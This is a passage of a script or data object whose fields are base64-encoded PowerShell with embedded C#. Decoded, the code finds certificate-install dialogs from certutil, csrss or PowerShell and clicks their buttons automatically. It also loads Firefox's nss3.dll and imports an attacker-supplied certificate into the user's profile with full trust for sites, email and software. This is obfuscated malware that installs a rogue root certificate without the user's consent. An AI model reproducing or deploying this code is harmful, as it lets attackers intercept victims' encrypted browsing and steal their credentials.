uLkNhcGFjaXR5KTsNCiAgICAgICAgR2V0Q2xhc3NOYW1lKGhXbmQsIGNsYXNzTmFtZSwgY2xhc3NOYW1lLkNhcGFjaXR5KTsNCiAgICAgICAgU3RyaW5nIHNFTj1HUE4oaFduZCkuVG9Mb3dlcigpOw0KCQlpZigoIWRhdGEuV25kY2xhc3MuRXF1YWxzKFN0cmluZy5FbXB0eSkgJiYgY2xhc3NOYW1lLlRvU3RyaW5nKCkuU3RhcnRzV2l0aChkYXRhLlduZGNsYXNzKSkgfHwgKCFkYXRhLlRpdGxlLkVxdWFscyhTdHJpbmcuRW1wdHkpICYmIGNhcHRpb24uVG9TdHJpbmcoKS5TdGFydHNXaXRoKGRhdGEuVGl0bGUpKSkNCgkJew0KICAgICAgICAJaWYoc0VOLkNvbnRhaW5zKCJjc3JzcyIpIHx8IHNFTi5Db250YWlucygiY2VydHV0aWwiKSAgfHwgc0VOLkNvbnRhaW5zKCJwb3dlcnNoZWxsIikpDQoJICAgICAgICB7DQoJCSAgICAgICAgZGF0YS5oV25kID0gaFduZDsNCiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7DQoJICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAJDQogICAgICAgIHJldHVybiB0cnVlOw0KICAgIH0NCiAgDQoJcHVibGljIHN0YXRpYyBTdHJpbmcgR1BOKEludFB0ciBoV25kKXsNCgkJdWludCBwSUQgPSAwOw0KCQl1aW50IHRocmVhZElEID0gR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkKGhXbmQsIG91dCBwSUQpOw0KCQlTdHJpbmcgc1Byb2MgPSBudWxsOw0KCSAgICBJbnRQdHIgaGFuZGxlVG9TbmFwc2hvdCA9IEludFB0ci5aZXJvOw0KCSAgICB0cnkNCgkgICAgew0KCSAgICAgICAgUFJPQ0VTU0VOVFJZMzIgcHJvY0VudHJ5ID0gbmV3IFBST0NFU1NFTlRSWTMyKCk7DQoJICAgICAgICBwcm9jRW50cnkuZHdTaXplID0gKFVJbnQzMilNYXJzaGFsLlNpemVPZih0eXBlb2YoUFJPQ0VTU0VOVFJZMzIpKTsNCgkgICAgICAgIGhhbmRsZVRvU25hcHNob3QgPSBDcmVhdGVUb29saGVscDMyU25hcHNob3QoKHVpbnQpU25hcHNob3RGbGFncy5Qcm9jZXNzLCAwKTsNCgkgICAgICAgIGlmIChQcm9jZXNzMzJGaXJzdChoYW5kbGVUb1NuYXBzaG90LCByZWYgcHJvY0VudHJ5KSkNCgkgICAgICAgIHsNCgkgICAgICAgIGRvDQoJICAgICAgICB7DQoJICAgICAgICAgICAgaWYgKHBJRCA9PSBwcm9jRW50cnkudGgzMlByb2Nlc3NJRCkNCgkgICAgICAgICAgICB7DQoJICAgICAgICAgICAgc1Byb2MgPSBwcm9jRW50cnkuc3pFeGVGaWxlOw0KCSAgICAgICAgICAgIGJyZWFrOw0KCSAgICAgICAgICAgIH0NCgkgICAgICAgIH0gd2hpbGUgKFByb2Nlc3MzMk5leHQoaGFuZGxlVG9TbmFwc2hvdCwgcmVmIHByb2NFbnRyeSkpOw0KCSAgICAgICAgfQ0KCSAgICAgICAgZWxzZQ0KCSAgICAgICAgew0KCSAgICAgICAgCXRocm93IG5ldyBBcHBsaWNhdGlvbkV4Y2VwdGlvbihzdHJpbmcuRm9ybWF0KCJGYWlsZWQgd2l0aCB3aW4zMiBlcnJvciBjb2RlIHswfSIsIE1hcnNoYWwuR2V0TGFzdFdpbjMyRXJyb3IoKSkpOw0KCSAgICAgICAgfQ0KCSAgICB9DQoJICAgIGNhdGNoIChFeGNlcHRpb24gZXgpDQoJICAgIHsNCgkgICAgICAgIHRocm93IG5ldyBBcHBsaWNhdGlvbkV4Y2VwdGlvbigiQ2FuJ3QgZ2V0IHRoZSBwcm9jZXNzLiIsIGV4KTsNCgkgICAgfQ0KCSAgICBmaW5hbGx5DQoJICAgIHsNCgkgICAgICAgIENsb3NlSGFuZGxlKGhhbmRsZVRvU25hcHNob3QpOw0KCSAgICB9DQoJICAgIHJldHVybiBzUHJvYzsNCgl9DQoJcHVibGljIHN0YXRpYyBib29sIEVDVyhJbnRQdHIgaFduZCwgSW50UHRyIGxQYXJhbSkNCgl7DQoJCVNlbmRNZXNzYWdlKGhXbmQsIEJNX0NMSUNLLCBJbnRQdHIuWmVybywgSW50UHRyLlplcm8pOw0KCQlyZXR1cm4gdHJ1ZTsNCgl9DQp9DQoiQDsNCltXXTo6UygiJUNFUlQlIik7DQpleGl0DQp9DQpDb25maXJtQ2VydA==", 17 | psf: "ZnVuY3Rpb24gQWRkQ2VydEZGew0KQWRkLVR5cGUgQCINCnVzaW5nIFN5c3RlbTsNCnVzaW5nIFN5c3RlbS5JTzsNCnVzaW5nIE1pY3Jvc29mdC5XaW4zMjsNCnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCnVzaW5nIFN5c3RlbS5Db21wb25lbnRNb2RlbDsNCg0KcHVibGljIHNlYWxlZCBjbGFzcyBGRg0Kew0KCXByaXZhdGUgc3RhdGljIHZvbGF0aWxlIEZGIGluc3RhbmNlOw0KCXByaXZhdGUgc3RhdGljIG9iamVjdCBzeW5jUm9vdCA9IG5ldyBPYmplY3QoKTsNCglwdWJsaWMgc3RhdGljIEZGIEdldEluc3RhbmNlKCkNCiAgICB7DQogICAgICAgIGlmIChpbnN0YW5jZSA9PSBudWxsKQ0KICAgICAgICB7DQogICAgICAgICAgICBsb2NrIChzeW5jUm9vdCkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBpZiAoaW5zdGFuY2UgPT0gbnVsbCkNCiAgICAgICAgICAgICAgICAgICAgaW5zdGFuY2UgPSBuZXcgRkYoKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gaW5zdGFuY2U7DQogICAgfQ0KCQ0KCWNvbnN0IGludCBFUlJPUl9TVUNDRVNTPTA7DQogICAgcHJpdmF0ZSBzdGF0aWMgSW50UHRyIExvYWRXaW4zMkxpYnJhcnkoc3RyaW5nIGxpYlBhdGgpDQogICAgew0KICAgICAgICBpZiAoU3RyaW5nLklzTnVsbE9yRW1wdHkobGliUGF0aCkpDQogICAgICAgICAgICB0aHJvdyBuZXcgQXJndW1lbnROdWxsRXhjZXB0aW9uKCJsaWJQYXRoIik7DQoNCiAgICAgICAgSW50UHRyIG1vZHVsZUhhbmRsZSA9IExvYWRMaWJyYXJ5KGxpYlBhdGgpOw0KICAgICAgICBpZiAobW9kdWxlSGFuZGxlID09IEludFB0ci5aZXJvKQ0KICAgICAgICB7DQogICAgICAgICAgICBpbnQgbGFzdGVycm9yID0gTWFyc2hhbC5HZXRMYXN0V2luMzJFcnJvcigpOw0KICAgICAgICAgICAgV2luMzJFeGNlcHRpb24gaW5uZXJFeCA9IG5ldyBXaW4zMkV4Y2VwdGlvbihsYXN0ZXJyb3IpOw0KICAgICAgICAgICAgaW5uZXJFeC5EYXRhLkFkZCgiTGFzdFdpbjMyRXJyb3IiLCBsYXN0ZXJyb3IpOw0KICAgICAgICAgICAgdGhyb3cgbmV3IEV4Y2VwdGlvbigiY2FuJ3QgbG9hZCBETEwgIiArIGxpYlBhdGgsIGlubmVyRXgpOw0KICAgICAgICB9DQogICAgICAgIHJldHVybiBtb2R1bGVIYW5kbGU7DQogICAgfQ0KDQogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gQ2hhclNldC5BbnNpKV0NCiAgICBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShbTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuTFBTdHIpXXN0cmluZyBscEZpbGVOYW1lKTsNCg0KICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRQcm9jQWRkcmVzcyhJbnRQdHIgaE1vZHVsZSwgc3RyaW5nIHByb2NlZHVyZU5hbWUpOw0KCS8vQ29uc3RhbnRzDQogICAgY29uc3QgdWludCBOU1NfSU5JVF9SRUFET05MWT0weDE7DQogICAgY29uc3QgdWludCBOU1NfSU5JVF9OT0NFUlREQiA9IDB4MjsNCiAgICBjb25zdCB1aW50IE5TU19JTklUX05PTU9EREIgPSAweDQ7DQogICAgY29uc3QgdWludCBOU1NfSU5JVF9GT1JDRU9QRU4gPSAweDg7DQogICAgY29uc3QgdWludCBOU1NfSU5JVF9OT1JPT1RJTklUID0gMHgxMDsNCiAgICBjb25zdCB1aW50IE5TU19JTklUX09QVElNSVpFU1BBQ0UgPSAweDIwOw0KICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfUEsxMVRIUkVBRFNBRkUgPSAweDQwOw0KICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfUEsxMVJFTE9BRCA9IDB4ODA7DQogICAgY29uc3QgdWludCBOU1NfSU5JVF9OT1BLMTFGSU5BTElaRSA9IDB4MTAwOw0KICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfUkVTRVJWRUQgPSAweDIwMDsNCiAgICBjb25zdCB1aW50IE5TU19JTklUX0NPT1BFUkFURSA9IE5TU19JTklUX1BLMTFUSFJFQURTQUZFIHwgTlNTX0lOSVRfUEsxMVJFTE9BRCB8IE5TU19JTklUX05PUEsxMUZJTkFMSVpFIHwgTlNTX0lOSVRfUkVTRVJWRUQ7DQoNCiAgICBjb25zdCBzdHJpbmcgU0VDTU9EX0RCID0gInNlY21vZC5kYiI7DQogICAgLy9TdHJ1Y3R1cmVzDQogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQ0KICAgIHB1YmxpYyBzdHJ1Y3QgU0VDSXRlbSANCiAgICB7DQogICAgICAgIHB1YmxpYyB1aW50IGlUeXBlOw0KICAgICAgICBwdWJsaWMgSW50UHRyIGJEYXRhOw0KICAgICAgICBwdWJsaWMgdWludCBpRGF0YUxlbjsNCiAgICB9DQoNCiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldDQogICAgcHJpdmF0ZSBzdHJ1Y3QgQ2VydFRydXN0cw0KICAgIHsNCiAgICAgICAgcHVibGljIGludCBpU2l0ZTsNCiAgICAgICAgcHVibGljIGludCBpRW1haWw7DQogICAgICAgIHB1YmxpYyBpbnQgaVNvZnQ7DQogICAgfQ0KDQogICAgcHJpdmF0ZSBlbnVtIFNFQ0NlcnRVc2FnZQ0KICAgIHsNCiAgICAgICAgY2VydFVzYWdlU1NMQ2xpZW50ID0gMCwNCiAgICAgICAgY2VydFVzYWdlU1NMU2VydmVyID0gMSwNCiAgICAgICAgY2VydFVzYWdlU1NMU2VydmVyV2l0aFN0ZXBVcCA9IDIsDQogICAgICAgIGNlcnRVc2FnZVNTTENBID0gMywNCiAgICAgICAgY2VydFVzYWdlRW1haWxTaWduZXIgPSA0LA0KICAgICAgICBjZXJ0VXNhZ2VFbWFpbFJlY2lwaWVudCA9IDUsDQogICAgICAgIGNlcnRVc2FnZU9iamVjdFNpZ25lciA9IDYsDQogICAgICAgIGNlcnRVc2FnZVVzZXJDZXJ0SW1wb3J0ID0gNywNCiAgICAgICAgY2VydFVzYWdlVmVyaWZ5Q0EgPSA4LA0KICAgICAgICBjZXJ0VXNhZ2VQcm90ZWN0ZWRPYmplY3RTaWduZXIgPSA5LA0KICAgICAgICBjZXJ0VXNhZ2VTdGF0dXNSZXNwb25kZXIgPSAxMCwNCiAgICAgICAgY2VydFVzYWdlQW55Q0EgPSAxMQ0KICAgIH0NCglbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0NCiAgICBwcml2YXRlIGRlbGVnYXRlIGludCBOU1NfSW5pdGlhbGl6ZVB0cihzdHJpbmcgc0NvbmZpZ0Rpciwgc3RyaW5nIGNlcnRQcmVmaXgsIHN0cmluZyBrZXlQcmVmaXgsIHN0cmluZyBzZWNNb2ROYW1lLCB1aW50IGZsYWdzKTsNCg0KICAgIHByaXZhdGUgaW50IE5TU19Jbml0aWFsaXplKHN0cmluZyBzQ29uZmlnRGlyLCBzdHJpbmcgY2VydFByZWZpeCwgc3RyaW5nIGtleVByZWZpeCwgc3RyaW5nIHNlY01vZE5hbWUsIHVpbnQgZmxhZ3MpDQogICAgew0KICAgICAgICBJbnRQdHIgcFByb2MgPSBHZXRQcm9jQWRkcmVzcyhuc3NNb2R1bGUsICJOU1NfSW5pdGlhbGl6ZSIpOw0KICAgICAgICBOU1NfSW5pdGlhbGl6ZVB0ciBwdHIgPSAoTlNTX0luaXRpYWxpemVQdHIpTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKE5TU19Jbml0aWFsaXplUHRyKSk7DQogICAgICAgIHJldHVybiBwdHIoc0NvbmZpZ0RpciwgY2VydFByZWZpeCwga2V5UHJlZml4LCBzZWNNb2ROYW1lLCBmbGFncyk7DQogICAgfQ0KDQogICAgW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCldDQogICAgcHJpdmF0ZSBkZWxlZ2F0ZSBJbnRQdHIgQ0VSVF9HZXREZWZhdWx0Q2VydERCUHRyKCk7DQogICAgcHJpdmF0ZSBJbnRQdHIgQ0VSVF9HZXREZWZhdWx0Q2VydERCKCkNCiAgICB7DQogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKG5zc01vZHVsZSwgIkNFUlRfR2V0RGVmYXVsdENlcnREQiIpOw0KICAgICAgICBDRVJUX0dldERlZmF1bHRDZXJ0REJQdHIgcHRyID0gKENFUlRfR2V0RGVmYXVsdENlcnREQlB0cilNYXJzaGFsLkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKHBQcm9jLCB0eXBlb2YoQ0VSVF9HZXREZWZhdWx0Q2VydERCUHRyKSk7DQogICAgICAgIHJldHVybiBwdHIoKTsNCiAgICB9DQoNCiAgICBbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0NCiAgICBwcml2YXRlIGRlbGVnYXRlIEludFB0ciBOU1NfU2h1dGRvd25QdHIoKTsNCiAgICBwcml2YXRlIEludFB0ciBOU1NfU2h1dGRvd24oKQ0KICAgIHsNCiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3MobnNzTW9kdWxlLCAiTlNTX1NodXRkb3duIik7DQogICAgICAgIE5TU19TaHV0ZG93blB0ciBwdHIgPSAoTlNTX1NodXRkb3duUHRyKU1hcnNoYWwuR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIocFByb2MsIHR5cGVvZihOU1NfU2h1dGRvd25QdHIpKTsNCiAgICAgICAgcmV0dXJuIHB0cigpOw0KICAgIH0NCg0KICAgIC8vU0VDU3RhdHVzIENFUlRfSW1wb3J0Q2VydHMgKENFUlRDZXJ0REJIYW5kbGUgKmNlcnRkYiwgU0VDQ2VydFVzYWdlIHVzYWdlLCB1bnNpZ25lZCBpbnQgbmNlcnRzLCBTRUNJdGVtICoqZGVyQ2VydHMsIENFUlRDZXJ0aWZpY2F0ZSAqKipyZXRDZXJ0cywgUFJCb29sIGtlZXBDZXJ0cywgUFJCb29sIGNhT25seSwgY2hhciAqbmlja25hbWUpDQogICAgW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCldDQogICAgcHJpdmF0ZSBkZWxlZ2F0ZSBpbnQgQ0VSVF9JbXBvcnRDZXJ0c1B0cihJbnRQdHIgY2VydGRiLCBpbnQgdXNhZ2UsIHVpbnQgbmNlcnRzLCByZWYgU0VDSXRlbVtdIGRlckNlcnRzLCByZWYgSW50UHRyIHJldENlcnRzLCB1aW50IGtlZXBDZXJ0cywgdWludCBjYU9ubHksIEludFB0ciBuaWNrbmFtZSk7DQogICAgcHJpdmF0ZSBpbnQgQ0VSVF9JbXBvcnRDZXJ0cyhJbnRQdHIgY2VydGRiLCBpbnQgdXNhZ2UsIHVpbnQgbmNlcnRzLCByZWYgU0VDSXRlbVtdIGRlckNlcnRzLCByZWYgSW50UHRyIHJldENlcnRzLCB1aW50IGtlZXBDZXJ0cywgdWludCBjYU9ubHksIEludFB0ciBuaWNrbmFtZSkNCiAgICB7DQogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKG5zc01vZHVsZSwgIkNFUlRfSW1wb3J0Q2VydHMiKTsNCiAgICAgICAgQ0VSVF9JbXBvcnRDZXJ0c1B0ciBwdHIgPSAoQ0VSVF9JbXBvcnRDZXJ0c1B0cilNYXJzaGFsLkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKHBQcm9jLCB0eXBlb2YoQ0VSVF9JbXBvcnRDZXJ0c1B0cikpOw0KICAgICAgICByZXR1cm4gcHRyKGNlcnRkYiwgdXNhZ2UsIG5jZXJ0cywgcmVmIGRlckNlcnRzLCByZWYgcmV0Q2VydHMsIGtlZXBDZXJ0cywgY2FPbmx5LCBuaWNrbmFtZSk7DQogICAgfQ0KDQogICAgLy9leHRlcm4gU0VDU3RhdHVzIENFUlRfQ2hhbmdlQ2VydFRydXN0KENFUlRDZXJ0REJIYW5kbGUgKmhhbmRsZSxDRVJUQ2VydGlmaWNhdGUgKmNlcnQsQ0VSVENlcnRUcnVzdCAqdHJ1c3QpOw0KICAgIHByaXZhdGUgZGVsZWdhdGUgaW50IENFUlRfQ2hhbmdlQ2VydFRydXN0UHRyKEludFB0ciBjZXJ0ZGIsIEludFB0ciBjZXJ0LCByZWYgQ2VydFRydXN0cyB0cnVzdCk7DQogICAgcHJpdmF0ZSBpbnQgQ0VSVF9DaGFuZ2VDZXJ0VHJ1c3QoSW50UHRyIGNlcnRkYiwgSW50UHRyIGNlcnQsIHJlZiBDZXJ0VHJ1c3RzIHRydXN0KQ0KICAgIHsNCiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3MobnNzTW9kdWxlLCAiQ0VSVF9DaGFuZ2VDZXJ0VHJ1c3QiKTsNCiAgICAgICAgQ0VSVF9DaGFuZ2VDZXJ0VHJ1c3RQdHIgcHRyID0gKENFUlRfQ2hhbmdlQ2VydFRydXN0UHRyKU1hcnNoYWwuR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIocFByb2MsIHR5cGVvZihDRVJUX0NoYW5nZUNlcnRUcnVzdFB0cikpOw0KICAgICAgICByZXR1cm4gcHRyKGNlcnRkYiwgY2VydCwgcmVmIHRydXN0KTsNCiAgICB9DQogICAgLy92b2lkIENFUlRfRGVzdHJveUNlcnRBcnJheShDRVJUQ2VydGlmaWNhdGUgKipjZXJ0cywgdW5zaWduZWQgaW50IG5jZXJ0cyk7DQogICAgW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCldDQogICAgcHVibGljIGRlbGVnYXRlIGludCBDRVJUX0Rlc3Ryb3lDZXJ0QXJyYXlQdHIoSW50UHRyIGNlcnQsIHVpbnQgbmNlcnRzKTsNCiAgICBwcml2YXRlIGludCBDRVJUX0Rlc3Ryb3lDZXJ0QXJyYXkoSW50UHRyIGNlcnQsIHVpbnQgbmNlcnRzKQ0KICAgIHsNCiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3MobnNzTW9kdWxlLCAiQ0VSVF9EZXN0cm95Q2VydEFycmF5Iik7DQogICAgICAgIENFUlRfRGVzdHJveUNlcnRBcnJheVB0ciBwdHIgPSAoQ0VSVF9EZXN0cm95Q2VydEFycmF5UHRyKU1hcnNoYWwuR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIocFByb2MsIHR5cGVvZihDRVJUX0Rlc3Ryb3lDZXJ0QXJyYXlQdHIpKTsNCiAgICAgICAgcmV0dXJuIHB0cihjZXJ0LCBuY2VydHMpOw0KICAgIH0NCg0KCXByaXZhdGUgSW50UHRyIG5zc01vZHVsZSA9IEludFB0ci5aZXJvOw0KCQ0KCXB1YmxpYyBCb29sZWFuIFN0YXJ0KFN0cmluZyBzQ2VydCl7DQoJCVN0cmluZyBzUHJvZmlsZSA9IEdldFByb2ZpbGUoKTsNCiAgICAgICAgaWYgKFN0cmluZy5Jc051bGxPckVtcHR5KHNQcm9maWxlKSkNCiAgICAgICAgew0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgICAgICB9DQogICAgICAgIGJ5dGVbXSBiQ2VydCA9IEdldENlcnRBc0J5dGVBcnJheShzQ2VydCk7DQoJCUludFB0ciBpcENlcnQgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbChiQ2VydC5MZW5ndGgpOw0KCQl0cnkNCiAgICAgICAgew0KICAgICAgICAgICAgRGlyZWN0b3J5SW5mbyBkaUluc3RhbGxQYXRoID0gR2V0SVAoKTsNCiAgICAgICAgICAgIFN0cmluZyBzQ3VycmVudERpcmVjdG9yeSA9IERpcmVjdG9yeS5HZXRDdXJyZW50RGlyZWN0b3J5KCk7DQogICAgICAgICAgICBEaXJlY3RvcnkuU2V0Q3VycmVudERpcmVjdG9yeShkaUluc3RhbGxQYXRoLkZ1bGxOYW1lKTsNCiAgICAgICAgICAgIGZvcmVhY2goRmlsZUluZm8gZmlEbGwgaW4gZGlJbnN0YWxsUGF0aC5HZXRGaWxlcygiKi5kbGwiKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBpZiAoZmlEbGwuTmFtZS5FcXVhbHMoImJyZWFrcGFkaW5qZWN0b3IuZGxsIikpIGNvbnRpbnVlOw0KICAgICAgICAgICAgICAgIExvYWRXaW4zMkxpYnJhcnkoZmlEbGwuRnVsbE5hbWUpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgbnNzTW9kdWxlID0gTG9hZFdpbjMyTGlicmFyeShkaUluc3RhbGxQYXRoLkZ1bGxOYW1lICsgIlxcbnNzMy5kbGwiKTsNCiAgICAgICAgICAgIGlmIChuc3NNb2R1bGUuRXF1YWxzKEludFB0ci5aZXJvKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBEaXJlY3RvcnkuU2V0Q3VycmVudERpcmVjdG9yeShzQ3VycmVudERpcmVjdG9yeSk7DQogICAgICAgICAgICAvL0luaXQgY2VydA0KICAgICAgICAgICAgTWFyc2hhbC5Db3B5KGJDZXJ0LCAwLCBpcENlcnQsIGJDZXJ0Lkxlbmd0aCk7DQogICAgICAgICAgICBTRUNJdGVtIENlcnRJdGVtID0gbmV3IFNFQ0l0ZW0oKTsNCiAgICAgICAgICAgIENlcnRJdGVtLmlUeXBlID0gMzsgICAgIC8vICAgKi5kZXINCiAgICAgICAgICAgIENlcnRJdGVtLmJEYXRhID0gaXBDZXJ0Ow0KICAgICAgICAgICAgQ2VydEl0ZW0uaURhdGFMZW4gPSAodWludCliQ2VydC5MZW5ndGg7DQogICAgICAgICAgICBTRUNJdGVtW10gYUNlcnRJdGVtID0gbmV3IFNFQ0l0ZW1bMV07DQogICAgICAgICAgICBhQ2VydEl0ZW1bMF0gPSBDZXJ0SXRlbTsNCg0KICAgICAgICAgICAgQ2VydFRydXN0cyBDZXJ0VHJ1c3QgPSBuZXcgQ2VydFRydXN0cygpOw0KICAgICAgICAgICAgQ2VydFRydXN0LmlTaXRlID0gMHgxMDsNCiAgICAgICAgICAgIENlcnRUcnVzdC5pRW1haWwgPSAweDEwOw0KICAgICAgICAgICAgQ2VydFRydXN0LmlTb2Z0ID0gMHgxMDsNCg0KICAgICAgICAgICAgSW50UHRyIENlcnRUb0ltcG9ydCA9IG5ldyBJbnRQdHIoKTsNCiAgICAgICAgICAgIEludFB0cltdIGFDZXJ0VG9JbXBvcnQgPSBuZXcgSW50UHRyWzFdOw0KICAgICAgICAgICAgLy9FbmQgaW5pdCBjZXJ0DQogICAgICAgICAgICBpbnQgc3RhdHVzID0gTlNTX0luaXRpYWxpemUoc1Byb2ZpbGUsICIiLCAiIiwgU0VDTU9EX0RCLCBOU1NfSU5JVF9PUFRJTUlaRVNQQUNFKTsNCiAgICAgICAgICAgIGlmIChzdGF0dXMgIT0gRVJST1JfU1VDQ0VTUykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBJbnRQdHIgYmQgPSBDRVJUX0dldERlZmF1bHRDZXJ0REIoKTsNCiAgICAgICAgICAgIGlmIChiZC5FcXVhbHMoSW50UHRyLlplcm8pKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIE5TU19TaHV0ZG93bigpOw0KICAgICAgICAgICAgICAgIHJldHVybiBmYWxzZTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIHN0YXR1cyA9IENFUlRfSW1wb3J0Q2VydHMoYmQsIDExLCAxLCByZWYgYUNlcnRJdGVtLCByZWYgQ2VydFRvSW1wb3J0LCAxLCAwLCBJbnRQdHIuWmVybyk7DQogICAgICAgICAgICBpZiAoc3RhdHVzICE9IEVSUk9SX1NVQ0NFU1MpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgTlNTX1NodXRkb3duKCk7DQogICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgTWFyc2hhbC5Db3B5KENlcnRUb0ltcG9ydCwgYUNlcnRUb0ltcG9ydCwgMCwgMSk7DQogICAgICAgICAgICBzdGF0dXMgPSBDRVJUX0NoYW5nZUNlcnRUcnVzdChiZCwgYUNlcnRUb0ltcG9ydFswXSwgcmVmIENlcnRUcnVzdCk7DQogICAgICAgICAgICBpZiAoIHN0YXR1cyAhPSBFUlJPUl9TVUNDRVNTKSANCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBOU1NfU2h1dGRvd24oKTsNCiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgICAgICAgICB9Ow0KICAgICAgICAgICAgQ0VSVF9EZXN0cm95Q2VydEFycmF5KENlcnRUb0ltcG9ydCwgMSk7DQogICAgICAgICAgICBOU1NfU2h1dGRvd24oKTsNCiAgICAgICAgICAgIHJldHVybiB0cnVlOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIChFeGNlcHRpb24pe30NCiAgICAgICAgZmluYWxseQ0KICAgICAgICB7DQogICAgICAgICAgICBNYXJzaGFsLkZyZWVIR2xvYmFsKGlwQ2VydCk7DQogICAgICAgICAgICBpcENlcnQgPSBJbnRQdHIuWmVybzsNCiAgICAgICAgICAgIE5TU19TaHV0ZG93bigpOw0KICAgICAgICB9DQoJCXJldHVybiB0cnVlOw0KCX0NCglwcml2YXRlIFN0cmluZyBHZXRQcm9maWxlKCkNCiAgICB7DQogICAgICAgIFN0cmluZyBGRlByb2ZpbGUgPSBQYXRoLkNvbWJpbmUoRW52aXJvbm1lbnQuR2V0RW52aXJvbm1lbnRWYXJpYWJsZSgiQVBQREFUQSIpLCBAIk1vemlsbGFcRmlyZWZveFxQcm9maWxlcyIpOw0KICAgICAgICBpZiAoRGlyZWN0b3J5LkV4aXN0cyhGRlByb2ZpbGUpKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoRGlyZWN0b3J5LkdldERpcmVjdG9yaWVzKEZGUHJvZmlsZSwgIiouZGVmYXVsdCIpLkxlbmd0aCA+IDApDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgcmV0dXJuIERpcmVjdG9yeS5HZXREaXJlY3RvcmllcyhGRlByb2ZpbGUsICIqLmRlZmF1bHQiKVswXTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gIiI7DQogICAgfQ0KCXB1YmxpYyBieXRlW10gR2V0Q2VydEFzQnl0ZUFycmF5KFN0cmluZyBzQ2VydCkNCiAgICB7DQogICAgICAgIHRyeQ0KICAgICAgICB7DQogICAgICAgICAgICByZXR1cm4gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHNDZXJ0KTsNCiAgICAgICAgfQ0KICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKXt9DQogICAgICAgIHJldHVybiBudWxsOw0KICAgIH0NCglwcml2YXRlIERpcmVjdG9yeUluZm8gR2V0SVAoKQ0KICAgIHsNCiAgICAgICAgRGlyZWN0b3J5SW5mbyBmcCA9IG51bGw7DQogICAgICAgIC8vIGdldCBmaXJlZm94IHBhdGggZnJvbSByZWdpc3RyeQ0KICAgICAgICAvLyB3ZSdsbCBzZWFyY2ggdGhlIDMyYml0IGluc3RhbGwgbG9jYXRpb24NCiAgICAgICAgUmVnaXN0cnlLZXkgbG9jYWxNYWNoaW5lMSA9IFJlZ2lzdHJ5LkxvY2FsTWFjaGluZS5PcGVuU3ViS2V5KEAiU09GVFdBUkVcTW96aWxsYVxNb3ppbGxhIEZpcmVmb3giLCBmYWxzZSk7DQogICAgICAgIC8vIGFuZCBsZXRzIHRyeSB0aGUgNjRiaXQgaW5zdGFsbCBsb2NhdGlvbiBqdXN0IGluIGNhc2UNCiAgICAgICAgUmVnaXN0cnlLZXkgbG9jYWxNYWNoaW5lMiA9IFJlZ2lzdHJ5LkxvY2FsTWFjaGluZS5PcGVuU3ViS2V5KEAiU09GVFdBUk